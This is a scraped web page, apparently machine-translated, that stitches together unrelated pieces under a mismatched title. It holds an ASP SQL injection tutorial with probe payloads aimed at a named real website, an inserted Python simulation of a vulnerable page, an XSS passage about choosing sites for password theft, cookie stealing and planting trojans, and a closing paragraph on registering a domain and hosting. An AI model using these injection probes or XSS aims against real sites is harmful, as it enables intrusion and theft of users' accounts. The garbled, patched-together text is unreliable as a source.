Comparison of computing power of XSS mainframe
Publish: 2021-05-14 04:24:40
1. With the spread of B/S (browser/server) application development, more and more programmers write applications in this mode. However, because the entry threshold of this industry is not high and the level and experience of programmers are uneven, a considerable number of programmers do not check the legitimacy of user input when writing code, which leaves their applications with security risks. A user can submit a piece of database query code and, from the results the program returns, obtain the data he wants to know. This is the so-called SQL injection. SQL injection comes in through the normal WWW port and looks no different from ordinary web page access, so the firewalls currently on the market do not alert on it. If the administrator does not have the habit of checking the IIS logs, he may not notice the intrusion for a long time. However, SQL injection is quite flexible, and many unexpected situations arise during injection. Whether you can analyze the specific situation and construct an ingenious SQL statement to successfully obtain the desired data is the fundamental difference between the expert and the "rookie". Judging by the national situation, more than 70% of domestic websites use ASP + Access or SQL Server, PHP + MySQL accounts for 20%, and the rest are less than 10%. In this article we explain the methods and skills of ASP injection from the entry level through the intermediate level to the advanced level. The article on PHP injection is written by Zwell, another friend from NB Alliance. We hope it will be useful to security workers and programmers. Those who already know about ASP injection, please do not skip the introductory chapter, because some people have misunderstandings about the basic way of judging an injection point. Are you ready? Let's go.

If you have not tried SQL injection before, first open the IE menu => Tools => Internet Options => Advanced and untick "Show friendly HTTP error messages". Otherwise, whatever error the server returns, IE will only display "HTTP 500 server error", and you will get no further information.

Section 1: SQL injection principle

Let's start from a website, www.19cn.com (note: this article was approved by the webmaster before publication; most of the data is real). On the home page of the site there is a link named "Multiple solutions for IE can't open a new window", whose address is: http://www.19cn.com/showdetail.asp?id=49 . Append a single quote to the end of this address (id=49') and the server returns the following error:

Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'ID=49''.
/showdetail.asp, line 8

From this error we can see the following points: 1. The website uses an Access database, connected through the JET engine rather than through ODBC. 2. The program does not check whether the data submitted by the client meets its requirements. 3. The table queried by the SQL statement has a field named ID. From the above example we can see that the principle of SQL injection is to submit special code from the client, collect information about the program and the server from what comes back, and so obtain the information you want.

Section 2: Judging whether SQL injection is possible

After reading Section 1, some people will think: I often test whether SQL injection is possible in this way; isn't it simple? In fact, this is not the best way. Why? First, not every server's IIS returns a specific error message to the client. If the program contains a statement such as cint(parameter), the SQL injection will not succeed, but the server will still report an error; the specific prompt is "An error occurred on the server when processing the URL. Please contact the system administrator." Second, some programmers who know a little about SQL injection think that filtering out single quotes makes it safe, and this is not rare; if you test with a single quote, you cannot detect the injection point. So which test method is more accurate? The answer is as follows:

① http://www.19cn.com/showdetail.asp?id=49
② http://www.19cn.com/showdetail.asp?id=49 and 1=1
③ http://www.19cn.com/showdetail.asp?id=49 and 1=2

This is the classic 1=1, 1=2 test method. How do you judge? Look at the results returned by the three URLs:

Injectable: ① displays normally (this is inevitable, otherwise the program itself is broken); ② displays normally, with basically the same content as ①; ③ prompts BOF or EOF (when the program makes no check), or prompts that no record can be found (when rs.eof is checked), or displays empty content (when the program uses On Error Resume Next).

Not injectable, which is easier to judge: ① also displays normally; ② and ③ generally show a program-defined error prompt or a type conversion error.

Of course, this is only the judgment method when the passed-in parameter is numeric. In practice there are also character-type and search-type parameters; I will analyze them in "General steps of SQL injection" in the intermediate chapter.

Section 3: Judging the database type and injection method

Different databases have different functions and injection methods, so before injecting we have to judge the database type. Generally, Access and SQL Server are the databases most frequently used with ASP, and more than 99% of the websites on the Internet use one of the two. How can a program tell you which database it uses? Let's look. SQL Server has some system variables. If the IIS error prompt is not turned off and SQL Server returns an error, you can get the answer directly from the error information. The method is:

http://www.19cn.com/showdetail.asp?id=49 and user>0

This sentence is very simple, but it contains the essence of SQL Server's unique injection method; I also discovered this highly efficient guessing method in an unintentional test. Let's see what it means: the preceding statement is normal; the focus is on "and user>0". As we know, user is a built-in variable of SQL Server whose value is the user name of the current connection, with type nvarchar. When an nvarchar value is compared with the int number 0, the system first tries to convert the nvarchar value to int, and of course an error occurs in the process. The SQL Server error is: "Syntax error converting the nvarchar value 'abc' to a column of data type int." Haha, abc is the value of the variable user. In this way you get the database user name without wasting any effort. In what follows you will see many sentences in this style. By the way, as we all know, the SQL Server user sa has a role equivalent to administrators permission; if you get sa permission, you can almost certainly get administrator on the host. The above method is very convenient for testing whether the login is sa. Note that if the login is sa, the prompt is that there is an error converting "dbo" to an int column, not "sa".

If IIS does not allow the server to return error prompts, how do you determine the database type? We can start from the differences between Access and SQL Server. Both have their own system tables, for example the table storing all objects in the database. In Access this is the system table [msysobjects], but reading that table in the web environment prompts "no permission"; in SQL Server it is the table [sysobjects], which can be read normally in the web environment.

Once it is confirmed that injection is possible, use the following statements:

http://www.19cn.com/showdetail.asp?id=49 and (select count(*) from sysobjects)>0
http://www.19cn.com/showdetail.asp?id=49 and (select count(*) from msysobjects)>0

If the database is SQL Server, the page for the first address is about the same as the original page http://www.19cn.com/showdetail.asp?id=49 ; the second address prompts an error because the table msysobjects cannot be found, and even if the program has fault-tolerance handling, the page is completely different from the original. If the database is Access, the situation is different: the page for the first address is completely different from the original page; the second depends on whether the database settings allow reading the system table, which generally is not allowed, so it is also completely different from the original. In most cases the first address alone tells you the database type used by the system; the second is only used for verification when the IIS error prompt is turned on.
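The three-URL test of Section 2 and the system-table fingerprint of Section 3, as an added Python example that is not part of the original article. The vulnerable showdetail.asp is simulated in-process with sqlite3: the table `news`, its rows and the error-page strings are constructed assumptions, and SQLite stands in for the Access/SQL Server backend, so the `and user>0` trick is not reproduced (SQLite has no `user` variable) and a `sqlite_master` entry is added to the candidate system tables so the fingerprint can be exercised. A hardened version of the page, which validates the parameter as an integer and binds it, is included to show why the same probes come back inconclusive against a properly written page.

```python
import sqlite3

# Constructed stand-in for the article's showdetail.asp: an in-memory SQLite
# database with one table. SQLite replaces the Access/SQL Server backend the
# article discusses; the table name, columns and rows are assumptions.
_conn = sqlite3.connect(":memory:")
_conn.executescript("""
    CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT);
    INSERT INTO news VALUES (49, 'Multiple solutions for IE not opening a new window');
    INSERT INTO news VALUES (50, 'Another article');
""")

EOF_PAGE = "ADODB.Recordset error: BOF or EOF is True"
CINT_ERROR_PAGE = ("An error occurred on the server when processing the URL. "
                   "Please contact the system administrator.")


def showdetail_vulnerable(id_param: str) -> str:
    """The bug the article describes: the query string is spliced straight
    into the SQL text, so 'and 1=1', a stray quote or a subselect all reach
    the database engine. The error text imitates the shape of the JET message."""
    sql = "SELECT title FROM news WHERE id=" + id_param
    try:
        row = _conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return "Microsoft JET Database Engine error: " + str(exc)
    return row[0] if row else EOF_PAGE


def showdetail_hardened(id_param: str) -> str:
    """The fix the article alludes to (CInt on the parameter), done properly:
    reject anything that is not an integer, then bind the value as a query
    parameter so it can never be parsed as SQL."""
    if not id_param.isdigit():
        return CINT_ERROR_PAGE
    row = _conn.execute("SELECT title FROM news WHERE id=?",
                        (int(id_param),)).fetchone()
    return row[0] if row else EOF_PAGE


def probe_numeric(page, base: str = "49") -> str:
    """Section 2's test for a numeric parameter: three requests compared
    against each other, not against any particular error string."""
    r_plain = page(base)
    r_true = page(base + " and 1=1")    # same page as r_plain if injectable
    r_false = page(base + " and 1=2")   # EOF / empty / different if injectable
    if r_plain == r_true and r_plain != r_false:
        return "injectable"
    return "not injectable"


# Section 3's fingerprint: a system table that only one engine owns. The
# article lists the first two; sqlite_master is added for the SQLite stand-in.
SYSTEM_TABLES = {
    "sysobjects": "SQL Server",
    "msysobjects": "Access",
    "sqlite_master": "SQLite",
}


def fingerprint_db(page, base: str = "49") -> str:
    """Appends 'and (select count(*) from <table>)>0' for each candidate: the
    engine that owns the table returns the baseline page, the others do not."""
    baseline = page(base)
    for table, engine in SYSTEM_TABLES.items():
        probe = f"{base} and (select count(*) from {table})>0"
        if page(probe) == baseline:
            return engine
    return "unknown"


if __name__ == "__main__":
    for name, page in (("vulnerable", showdetail_vulnerable),
                       ("hardened", showdetail_hardened)):
        print(name, probe_numeric(page), fingerprint_db(page))
```

Against the vulnerable page the three requests behave exactly as the article says (① and ② identical, ③ an EOF page) and the fingerprint lands on the one system table the engine can read; against the hardened page every modified parameter produces the same generic error, so both the injectability test and the fingerprint come back negative, which is the situation the article warns you cannot resolve with a single-quote test alone.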
2. 1. So such a website must be a game site, a bank site, QQ, Taobao or another influential site; it must hold the account passwords we usually want to steal. Or perhaps the site simply has very high traffic, so we can plant more trojans through it. If it is just an ordinary XSS vulnerability on a small site and we want to plant a trojan, it is better to post the address of the trojan page directly. 2. The site must have members who perform operations under their own authority, and these members have many meaningful operations or private personal data that we need, so that through XSS we can act as a logged-in visitor with that authority. I think cookie stealing should be counted under this item, because its purpose is also to obtain the user's operating permission (including stealing the password) in order to get some of the user's information or carry out operations under that permission. 3. DoS attacks or zombie machines, which also require a site with a very large number of visits; small sites are only used for our own attacks or for gathering information. We can use the page to make the visitor attack other sites continuously, or scan the LAN, and so on. Such JS tools have existed for a long time, for example JS port scanning, Jikto, XSS Shell and so on. 4. Generally speaking, this mainly occurs in forums or information management systems; in short, there must be an administrator. It requires the attacker to be quite familiar with the target system (generally such a system needs to be open source), so that he knows how to construct a statement to seize administrator privilege. 5. Achieving special effects, such as inserting video into a web space or inserting a block; for example, people on Sina Blog or Xiaonei (the campus network) achieve special effects and so on. Conclusion: so you should understand the nature of these websites: high traffic, members, administrators, valuable account passwords, or meaningful implementation of special effects.

If you have read "Ajax hacking with XSS", you should know that XSS comes in at least seven forms, such as input XSS and textarea XSS. Among them, URL XSS belongs to input XSS, and most of these vulnerabilities are non-persistent XSS, while textarea XSS is generally persistent XSS. That means that normally visiting a page will not trigger the non-persistent XSS, although this is the vulnerability most websites have, and the search part is also called the search XSS vulnerability. So when you get an input XSS, you just alert a small box. You brag to others that you found a hole and can pop an alert box at them, but in fact you cannot do anything with it. Even if you can plant some small trojans it is meaningless, because you might as well send the XSS page to others directly from your own virtual host. This is different from SQL injection. After all, XSS is a client-side thing. The purpose of SQL injection is usually to obtain permission on the target system, and the SQL statement itself is a server-side instruction; but XSS generally gets things from the client and executes client-side instructions. So they can "shout" that something is wrong, but you cannot shout just because an "alert" popped out of an "XSS window".
3. A website should at least include a domain name and host space. The domain name is what is usually called the web address, and the space is where the web files are put.
1. Apply for a domain name: the domain name should be easy to remember and understand. The shorter the domain name, the better. It can be the English name or the Chinese Pinyin of your brand name.
2. Apply for host space: if you can design web pages with software such as DW (Dreamweaver), use a virtual host; if you do not know how to design a website, you can do it just by typing. It is easy to operate and powerful, and you can try it for free.
Note: domestic hosts can only be accessed with your own domain name after it has been successfully registered (ICP filing), and it generally takes about 10 working days for the website to be registered; a personal website, after filing, cannot carry enterprise or product content. The international version of the quick-build website does not need to be filed and is not subject to filing restrictions.
I hope I can help you. Please add me.